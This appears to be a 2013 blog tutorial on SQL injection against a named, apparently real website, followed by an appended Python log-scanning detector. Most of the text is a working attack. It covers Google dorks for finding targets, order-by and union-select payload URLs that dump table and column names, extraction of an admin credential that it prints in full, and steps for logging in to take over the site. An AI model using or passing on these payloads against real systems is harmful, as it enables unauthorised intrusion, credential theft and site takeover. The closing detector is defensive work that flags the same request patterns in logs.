Thursday 5 September 2013

Advanced SQL Hacking Tutorial With Example



In this attack we break into a website's database, steal the credentials stored there and log in to the website with them. If the site has an admin panel, you can log in to that panel and take control of the whole website.

Step 1: Find vulnerable websites

1.) Go to www.google.com and search for:
    a.) inurl:php?id=
    b.) inurl:asp?id=

These Google dorks find pages that take a parameter through the GET method and hence may be vulnerable.

2.) After finding a candidate link on a website, suppose the link is:
  http://www.schoolarcade.com.pk/book_detail.php?id=309, then try appending a single quote:
http://www.schoolarcade.com.pk/book_detail.php?id=309'

Now if you get an SQL error like:
  mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/schoolar/public_html/book_detail.php on line 8
   You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax

[Image: Sqli Vulnerability]

then the site is vulnerable to SQL injection. Now let's move to step 2.

Step 2: Find the number of columns in the table

1.) Type order by 1-- at the end of the URL so that the final URL becomes: http://www.schoolarcade.com.pk/book_detail.php?id=309 order by 1--

If you don't get an error, try order by 2-- and so on until you get an error. Suppose you get the error at order by 13--.

It means there are a total of 12 columns in the table.

Step 3: Find vulnerable columns

1.) Now at the end of the URL type: union select all 1,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database(), and replace id=309 with id=-309, so the final URL becomes:

http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()

[Image: Sqli Vulnerability]

Now you can see some numbers on the screen, as shown in the image; these are the column numbers that are vulnerable, because their values are reflected in the page. In the image we can see that columns 1, 3, 5, 6, 7 and 8 are vulnerable; we will use columns 7 and 8 in the following steps.

Here we write up to 12 because the total number of columns found in the previous step is 12. information_schema is a built-in database that keeps information about every column, table and constraint in the database.

Step 4: Finding the database version

1.) Try this URL: http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,version(),8,9,10,11,12 from information_schema.tables where table_schema=database()

Here we replaced vulnerable column 7 with version(), a function that returns the database version.
If it displays a version greater than 5, as shown in the image below, then you can go ahead; otherwise leave this site and find another one. (The information_schema database used in the following steps only exists from MySQL 5.0 onwards.)

[Image: Sqli Vulnerability]

Step 5: Finding table names

1.) Try this URL: http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12 from information_schema.tables where table_schema=database()

Here we replaced vulnerable column 8 with group_concat(table_name). The table_name column of information_schema.tables contains the names of every table in the database.

Now, as you can see in the image below, it lists all the tables of the current database. Here I found an interesting table, admin_users, which holds the usernames and passwords of the site administrators.

[Image: Sqli Vulnerability]

Step 6: Finding column names

1.) Try this URL: http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,group_concat(column_name),9,10,11,12 from information_schema.columns where table_schema=database()

Here we have replaced vulnerable column 8 with group_concat(column_name) and also replaced information_schema.tables with information_schema.columns.

Now it will list all the columns, as shown in the image below, and we have to find the columns belonging to the admin_users table.

[Image: Sqli Vulnerability]

The columns corresponding to username and password are user_id and user_pass. Now we have the table and column names; we just have to retrieve the data from the table.

Step 8: To retrieve the username and password, replace vulnerable column 8 with group_concat(user_id,0x3a,user_pass); here user_id and user_pass are the column names and 0x3a is the hex value of ":", used only to separate the username from the password.

Replace the "from information_schema ...." part with "from admin_users", where admin_users is the table name.

Now you can see the username and password as "admin:P$apIll.11".

[Image: Sqli Vulnerability]

And now you have the site administrator's username and password too; you just have to find the admin login page.

Step 9: Finding the admin page

1.) You can guess it, or try a few common admin page locations like:

  a.) www.site.com/admin/
  b.) www.site.com/administrators
  c.) www.site.com/login.php

After finding the login page, log in using the username and password found above...

[Image: Sqli Vulnerability]

Congrats!!! You have hacked the website....
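The probing sequence above (the stray quote, the order by counting, the union select read of information_schema) leaves a very recognisable trail in a web server's access log. The following detector is an added example, not code from the original post: it runs over constructed Apache-style log lines whose query strings mirror the tutorial's requests (IPs, timestamps and sizes are made up) and flags each request so a site owner can spot the same pattern in their own logs.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed sample log (not real traffic); query strings follow the
# tutorial's sequence: normal request, quote probe, order by probe, union select.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Sep/2013:10:00:01 +0000] "GET /book_detail.php?id=309 HTTP/1.1" 200 5120
203.0.113.5 - - [05/Sep/2013:10:00:07 +0000] "GET /book_detail.php?id=309' HTTP/1.1" 500 812
203.0.113.5 - - [05/Sep/2013:10:00:19 +0000] "GET /book_detail.php?id=309%20order%20by%2013-- HTTP/1.1" 500 812
203.0.113.5 - - [05/Sep/2013:10:01:02 +0000] "GET /book_detail.php?id=-309%20union%20select%20all%201,2,3,4,5,6,7,group_concat(table_name),9,10,11,12%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 6044
198.51.100.9 - - [05/Sep/2013:10:02:00 +0000] "GET /book_detail.php?id=310 HTTP/1.1" 200 5100
"""

# Apache combined/common log format: client ip, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Each rule is applied to the URL-decoded, lowercased query string.
RULES = [
    ("quote_in_numeric_param", re.compile(r"=\s*-?\d+'")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\s*--")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("information_schema_read", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("group_concat_exfil", re.compile(r"\bgroup_concat\s*\(")),
]

def analyze_line(line):
    """Return (ip, path, status, [rule names]) for one log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    decoded = unquote_plus(parts.query).lower()
    hits = [name for name, rx in RULES if rx.search(decoded)]
    # An id that is not an integer on an endpoint expecting one is suspicious by itself.
    ids = parse_qs(parts.query).get("id", [])
    if any(not v.lstrip("-").isdigit() for v in ids):
        hits.append("non_numeric_id")
    return m.group("ip"), parts.path, m.group("status"), hits

def scan(log_text):
    """Return only the flagged requests, in log order."""
    results = [analyze_line(line) for line in log_text.splitlines()]
    return [r for r in results if r and r[3]]
```

Three of the five sample lines are flagged, all from the same client, which is the grouping (one IP, escalating rule hits, 500 responses) worth alerting on.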
